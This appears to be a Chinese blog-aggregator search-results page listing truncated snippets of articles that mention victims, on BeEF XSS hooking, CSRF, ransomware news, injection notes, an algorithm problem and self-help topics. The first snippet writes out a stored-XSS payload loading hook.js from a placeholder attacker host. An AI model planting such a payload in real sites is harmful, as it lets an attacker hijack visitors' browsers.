1.BEEF KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXS ...
分类:
其他好文 时间:
2019-04-27 21:23:04
阅读次数:
182
一 概念 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及财产安全。 二 过程 1 受害者 Bob 在银行有一笔存款,通过对银行的网站 ...
分类:
其他好文 时间:
2019-04-23 12:50:52
阅读次数:
204
二分+dij题目 首先读一遍题目,一定要仔细读(不要问我为什么,我就是受害者qwq 你会发现最终的费用是由最长的电话线决定的,而非电话线长度和。 至此就有了一个基本思路——枚举(二分)出可能的最长电话线长度,然后对其进行dij判断。 dij思路如下: 1.已知枚举出了假定答案ans; 2.在最短路过 ...
分类:
其他好文 时间:
2019-04-06 09:56:42
阅读次数:
99
[toc] "日本某地发生了一件谋杀案,警察通过排查确定杀人凶手必为4个嫌疑犯的一个。以下为4个嫌疑犯的供词 春风来不来的博客 CSDN博客" 日本某地发生了一件谋杀案,警察通过排查确定杀人凶手必为4个嫌疑犯的一个。以下为4个嫌疑犯的供词。 A说:不是我。 B说:是C。 C说:是D。 D说:C在胡说 ...
分类:
其他好文 时间:
2019-03-17 13:28:33
阅读次数:
300
众所周知,勒索病毒通过加密受害人电脑里的重要文件来进行勒索,通常要求受害人支付比特币才能解锁文件,然而最近国外出现一款新型的勒索病毒PewCrypt,当受害人感染该病毒后,并不要求受害者支付金钱或比特币,而是…… 概述 众所周知,勒索病毒通过加密受害人电脑里的重要文件来进行勒索,通常要求受害人支付比 ...
分类:
其他好文 时间:
2019-02-27 23:32:12
阅读次数:
355
学习 备份 TOP1-注入 简单来说,注入往往是应用程序缺少对输入进行安全型检查所引起的,攻击者把一些包含指令的数据发送给解释器,解释器会把收到的数据转换成指令执行。常见的注入包括sql注入,--os-shell,LDAP(轻量目录访问协议),xpath(XPath即为XML路径语言,它是一种用来确 ...
分类:
Web程序 时间:
2019-02-20 12:57:05
阅读次数:
203
1.积极主动,积极主动的人绝不浅尝辄止,他们知道要为自己的抉择负责,做出的选择总是基于原则和价值观,而不是基于情感或受限于周围条件,积极的人是变化的催生者。 消极被动,消极的人不愿为自己的抉择负责,他们总是觉得自己是受害者 受到周围环境 自己的过去和他人的拖累,他们不把自己看作是生活的主人。 2.以 ...
分类:
其他好文 时间:
2019-02-17 15:25:15
阅读次数:
197
本书总结 第一章 思维误区 1. 举证责任:证有不证无 2. 谴责受害者:寻找自身安全感 3. 因果倒置 / 互为因果——对立成因 4. 滑坡谬误:结论不言自明,有很强的说服力 避免上述的方法:科学的分配责任,训练归因过程(内部归因 + 外部归因) 第二章 工作、挣钱、求职 1. 4种劳动价值:体力 ...
分类:
其他好文 时间:
2019-02-05 14:24:02
阅读次数:
163
背景 这个系列有很多题,但是其实考察的相近,类似的就不在多说,我们来看吧。主要分几个点来讲: + 反射型 + 存储型 + JSON + XM + 头部字段相关 分类介绍 反射型 在请求中构造了XSS的Payload,一般又是受害者点击导致受害者的客户端被攻击。例如:http://172.16.204 ...
分类:
移动开发 时间:
2019-01-28 20:12:46
阅读次数:
282
1.漏洞简介 CSRF(Cross-Site Request Forgery,跨站点伪造请求)是一种网络攻击方式,该攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点,从而在未授权的情况下执行在权限保护之下的操作,具有很大的危害性。 2.原理 CSRF攻击者在用户已经登录目标网站之 ...
分类:
其他好文 时间:
2019-01-25 01:09:11
阅读次数:
245
